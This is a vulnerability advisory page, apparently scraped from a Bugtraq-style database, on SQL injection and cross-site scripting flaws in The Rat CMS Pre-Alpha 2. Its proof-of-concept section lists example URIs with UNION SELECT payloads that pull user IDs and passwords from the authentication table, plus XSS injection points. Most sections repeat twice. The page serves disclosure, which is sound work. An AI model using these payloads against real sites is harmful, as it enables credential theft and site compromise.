The Rat CMS Multiple SQL Injection and Cross-Site Scripting Vulnerabilities
BID:29959
Info
The Rat CMS Multiple SQL Injection and Cross-Site Scripting Vulnerabilities
| Bugtraq ID: | 29959 |
| Class: | Input Validation Error |
| CVE: |
CVE-2008-5163 |
| Remote: | Yes |
| Local: | No |
| Published: | Jun 26 2008 12:00AM |
| Updated: | May 07 2015 05:28PM |
| Credit: | CWH Underground |
| Vulnerable: |
The Rat Studios The Rat CMS Pre-Alpha 2 |
| Not Vulnerable: | |
Discussion
The Rat CMS Multiple SQL Injection and Cross-Site Scripting Vulnerabilities
The Rat CMS is prone to multiple input-validation vulnerabilities, including SQL-injection issues and cross-site scripting issues, because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
The Rat CMS Pre-Alpha 2 is vulnerable; other versions may also be affected.
The Rat CMS is prone to multiple input-validation vulnerabilities, including SQL-injection issues and cross-site scripting issues, because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
The Rat CMS Pre-Alpha 2 is vulnerable; other versions may also be affected.
Exploit / POC
The Rat CMS Multiple SQL Injection and Cross-Site Scripting Vulnerabilities
An attacker can exploit these issues via a browser. To exploit a cross-site scripting vulnerability, the attacker must entice a victim into following a malicious URI.
The following example URIs are available:
http://www.example.com/[trcms_path]/viewarticle.php?id=-9999/**/UNION/**/SELECT/**/user_id,user_password/**/FROM/**/tbl_auth_user--
http://www.example.com/[trcms_path]/viewarticle2.php?id=-9999/**/UNION/**/SELECT/**/user_id,user_password/**/FROM/**/tbl_auth_user--
http://www.example.com/[trcms_path]/viewarticle.php/<XSS>
http://www.example.com/[trcms_path]/viewarticle.php?id=<XSS>
http://www.example.com/[trcms_path]/viewarticle2.php?id=<XSS>
The following exploit code is available:
An attacker can exploit these issues via a browser. To exploit a cross-site scripting vulnerability, the attacker must entice a victim into following a malicious URI.
The following example URIs are available:
http://www.example.com/[trcms_path]/viewarticle.php?id=-9999/**/UNION/**/SELECT/**/user_id,user_password/**/FROM/**/tbl_auth_user--
http://www.example.com/[trcms_path]/viewarticle2.php?id=-9999/**/UNION/**/SELECT/**/user_id,user_password/**/FROM/**/tbl_auth_user--
http://www.example.com/[trcms_path]/viewarticle.php/<XSS>
http://www.example.com/[trcms_path]/viewarticle.php?id=<XSS>
http://www.example.com/[trcms_path]/viewarticle2.php?id=<XSS>
The following exploit code is available:
Solution / Fix
The Rat CMS Multiple SQL Injection and Cross-Site Scripting Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
The Rat CMS Multiple SQL Injection and Cross-Site Scripting Vulnerabilities
References:
References: